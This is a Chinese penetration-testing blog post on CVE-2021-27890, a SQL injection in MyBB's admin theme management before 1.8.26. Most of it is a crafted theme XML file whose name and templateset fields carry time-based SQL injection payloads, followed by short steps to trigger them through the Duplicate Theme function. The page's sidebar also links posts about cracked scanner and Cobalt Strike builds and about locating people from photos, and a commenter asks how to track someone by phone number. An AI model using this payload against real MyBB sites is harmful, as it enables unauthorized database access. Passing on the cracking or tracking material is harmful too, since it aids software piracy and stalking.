搜索 登录
CVE-2021-27890 MyBB后台论坛主题管理SQL注入漏洞
统计
  • 建站日期:2021-03-15
  • 文章总数:63 篇
  • 评论总数:51 条
  • 分类总数:14 个
  • 最后更新:2021年12月29日

CVE-2021-27890 MyBB后台论坛主题管理SQL注入漏洞

耳东 / / 0 评论 / 1.8k 阅读 /0 赞
怕什么真理无穷,进一寸有一寸的欢喜 .
本文阅读 1 分钟
首页 渗透测试 正文
广告

影响版本:

< 1.8.26

漏洞利用:

在后台主题管理处导入构造的恶意xml

<?xml version="1.0" encoding="UTF-8"?>
<theme name="1' and sleep(10) and '" version="1825">
<properties>
<templateset>-2' or sleep(0.01) or '</templateset>
<editortheme><![CDATA[mybb.css]]></editortheme>
<imgdir><![CDATA[images]]></imgdir>
<logo><![CDATA[images/logo.png]]></logo>
<tablespace><![CDATA[5]]></tablespace>
<borderwidth><![CDATA[0]]></borderwidth>
<color><![CDATA[]]></color>
<disporder><![CDATA[a:7:{s:10:"global.css";i:1;s:10:"usercp.css";i:2;s:9:"modcp.css";i:3;s:16:"star_ratings.css";i:4;s:14:"showthread.css";i:5;s:17:"thread_status.css";i:6;s:8:"css3.css";i:7;}]]></disporder>
</properties>
<stylesheets>
</stylesheets>
<templates>
</templates>
</theme>

点击Duplicate Theme,抓包,成功延时注入(导出主題也会存在该注入)

本文来自投稿,不代表本站立场,如若转载,请注明出处:https://www.cnhacker.cc/PenetrationTest/232.html
-- 展开阅读全文 --
CVE-2021-21972 VMware vCenter 6.5-7.0 远程命令执行漏洞
« 上一篇 04-10
齐治堡垒机前台远程命令执行漏洞
下一篇 » 04-11
广告

相关推荐

AntSword新类型 CmdLinux 预览

[Linux] AWVS14 破解版&破解补丁

[Windows] AWVS14 破解版&破解补丁

DolphinPHP 1.4.2 后台GetShell

发表评论

成为第一个评论的人

作者信息
耳东
怕什么真理无穷,进一寸有一寸的欢喜 .
发表文章 66 篇
最新文章
广告

动态快讯

热门文章

一篇“不一样”的真实渗透测试案例分析文章
1.9w 阅读 ,
[安全工具] AWVS14漏洞扫描器破解版下载Acunetix原版及破解器
6.1k 阅读 ,
如何通过一张照片找到一个人的位置
5.6k 阅读 ,
[Linux] AWVS14 破解版&amp;破解补丁
4k 阅读 ,
广告

标签TAG

更多标签

热评文章

最近回复

信仰leoLv.1
2021年12月27日

可是我怎么用手机号查人实时位置呢

如何通过一张照片找到一个人的位置

航機阿毓✈️Lv.1
2021年12月26日

应该是我配置出错了,有点尴尬了哈

用请求源端口识别Burp代理

航機阿毓✈️Lv.1
2021年12月23日

這個我試過了,總體上來說還行,不過好像又有點怪怪的

用请求源端口识别Burp代理

ponyLv.1
2021年09月16日

Cobalt_Strike_4.4_最新版去暗桩